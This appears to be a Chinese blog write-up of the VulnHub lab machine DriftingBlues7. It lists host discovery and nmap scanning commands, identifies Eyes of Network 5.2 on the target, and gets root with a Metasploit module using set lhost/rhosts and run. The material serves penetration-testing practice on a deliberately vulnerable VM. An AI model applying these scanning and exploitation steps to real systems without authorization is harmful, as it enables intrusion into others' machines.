靶机渗透练习08-driftingblues7 (msf的简单利用)

靶机地址: https://www.vulnhub.com/entry/driftingblues-7,680/

1、主机探活

arp-scan -I eth0 -l (指定网卡扫) 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息)
masscan 192.168.111.0/24 -p 80,22 (masscan 扫描的网段 -p 扫描端口号)
netdiscover -i eth0 -r 192.168.184.0/24 (netdiscover -i 网卡-r 网段)
nmap -sn 192.168.111.0/24

2、端口扫描

nmap -sS -A -sV -T4 -p- 192.168.111.21
22—ssh—OpenSSH 7.4 (protocol 2.0)
66—http—SimpleHTTPServer 0.6 (Python 2.7.5)
80—http—Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips
111—rpcbind—2-4 (RPC #100000)
443—ssl/http—Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips
2403—taskmaster2000?
3306—mysql—MariaDB (unauthorized)
8086—http—InfluxDB http admin 1.7.9

3、老样子,还是先从80端口入手
在这里插入图片描述
映入演练的就是一个大大的eyes of network

4、百度搜了一下发现是一个开源的监控方案
在这里插入图片描述
既然如此直接在msf里看看有没有exp
在这里插入图片描述
ok,有一个可以直接用的exp,我们直接尝试利用看看呗(其实应该是先知道网站上的版本)
在源代码中,有很多css,逐一点开可以在其中一个发现network的版本为5.2,在我们exp适用的版本内

https://192.168.111.21/css/eonweb.css

在这里插入图片描述
5、msf漏洞利用

搜索漏洞:search eyes of network
使用模块: use 0
设置 kali: set lhost 192.168.111.7
设置攻击目录: set rhosts 192.168.111.21
运行模块: run

在这里插入图片描述
利用成功,getuid发现直接是root权限了。。好家伙
在这里插入图片描述
完结散花~

总结:
1、信息收集很重要,包括目录扫描,源代码探查等
2、searchsploit 、msf 工具的使用

参考:鹏组安全师傅的wp

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值